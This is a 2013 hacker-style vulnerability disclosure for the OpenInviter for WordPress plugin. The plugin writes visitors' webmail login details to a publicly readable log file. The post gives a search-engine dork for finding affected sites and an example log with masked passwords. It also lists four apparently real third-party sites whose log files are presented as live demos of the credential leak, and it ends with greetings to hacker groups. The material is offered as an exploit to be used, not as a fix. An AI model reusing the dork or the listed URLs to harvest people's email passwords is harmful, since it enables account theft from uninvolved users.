##########################################################
# Title : OpenInviter for WordPress Disclose User Information
# Author : Ryuzaki Lawlet
# Blog  : justryuz.blogspot.com / www.justryuz.com
# E-mail : ryuzaki_l@y7mail.com / justryuz@facebook.com / justryuz@linuxmail.org
# Date: Sat Jan 5/2013 (5.47 pm)
# Vendor: http://wordpress.org/extend/plugins/openinviter-for-wordpress/
# Type : Web Apps
# Tested on : Ubuntu / Window XP
# Dork ; inurl:/OpenInviter/tmp/ & inurl:/OpenInviter/tmp/log_error.log
##########################################################

---->
#--info about OpenInviter for WordPress:
>> Allow your visitors to invite their contacts from Yahoo!, GMail, AOL, Hotmail and other providers to your blog.

Exploit:
all login user with this plugin have log record with email/password in log_error file in folder /tmp/ and this log_error file is disclose user information like email/password in main mail Yahoo!, GMail, AOL, Hotmail and other providers

Example

[Years-month-day TIME] Local Debugger
----------DETAILS START----------
TRANSPORT: curl
SERVICE: hotmail
USER: victim@hotmail.com
PASSWORD: *********
STEPS: 
    initial_get :
        URL: http://login.live.com/login.srf?id=2
        METHOD: GET
        RESPONSE: OK
    login_post :
        URL: https://login.live.com/ppsecure/post.srf?id=2&bk=1314918491
        METHOD: POST
        ELEMENTS: 
            PPSX=Passp
            PwdPad=
            type=
            PPFT=ChJRMpJiZhTe4Z7X92sBFddI9M!tmfKtPFtflhAC1VeryloMgt7rVPjP6ADrF!rndQQRq2ZVzysXjuyAYS9NjIe5*OllJx!vK7xAU3ym0ZdKQakLQgOgVnTZn8N81jKUy00TaxC8acf!uMH!sH56Y3GputfpqyBGW1FwrNVFXvun2MwBOPUKs!mWshzl0CYxwuMyGG*0vC1yLpHNXZEgrN!7wezhHpooEH3Sox*ThDrs
            LoginOptions=3
            login=victim@hotmail.com
            passwd=***********
        RESPONSE: OK
    first_redirect :
        URL: http://www.hotmail.msn.com/cgi-bin/sbox?t=9ikSpGCZTCYwY3a5CuPibCZnDn3GN5e*OrIs5kzbdHvcgNQ610Cgps14x5lTVph*hWu0fdotwA4j7zZubNVU36uA0ag!cfBdMn9G!BcYoxELnC1Uue0m96tijFO744DPJy&p=9TSxWDG0OAapNedMZ1LMYVhOLboD26IovMvgl2rTjU5pSHOcPyYJWT8vdIcp7B0!9asl4R0AUTIXJnwxk7tqrNDQFa8jRiV7P3DsXuMRz4HrkvEmy3oX8VvFMHMhrOm0vX6C3OSrjvPpmuluxkGCAviJzvHjPDhT4YhLdhpNW0U4mVYL7rTKlTayPOqjGXnEAA&mkt=EN-US&lc=1033&id=2
        METHOD: GET
        RESPONSE: FAILED

----------DETAILS END----------

#--Demo / live
http://brsinfo.com/cares/wp-content/plugins/contest/OpenInviter/tmp/log_error.log
http://www.123employee.com/wp-content/plugins/contest/OpenInviter/tmp/log_error.log
http://realestatemegalopolis.com/in/wp-content/plugins/contest/OpenInviter/tmp/log_error.log
http://www.learnpassion.net/lp/wp-content/plugins/contest/OpenInviter/tmp/log_error.log

and many at google :v....

#---->

Screenshot / Preview

http://i.imgur.com/tKILJ.png

<!----
 
#==================================================<Greet>==================================================#
# Sbkiller * Xay * HeavenSe7en * Lonely * Skiddo * Ben * DzDzul * Sykes * RedJohn * LodVViP * PhiberOptick  #
# KedAns-Dz * r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) * NuxbieCyber ..all      #
# CyberSec Crew * Cyber 4rmy * T3D Hacker * DevilSec * RileksCrew * TBD * Newbie3vilc063rs * MyHex * GaySec #
#      www.1337day.com /.net /.org * packetstormsecurity.org * cxsecurity * All Security and Exploits       #
#===========================================================================================================#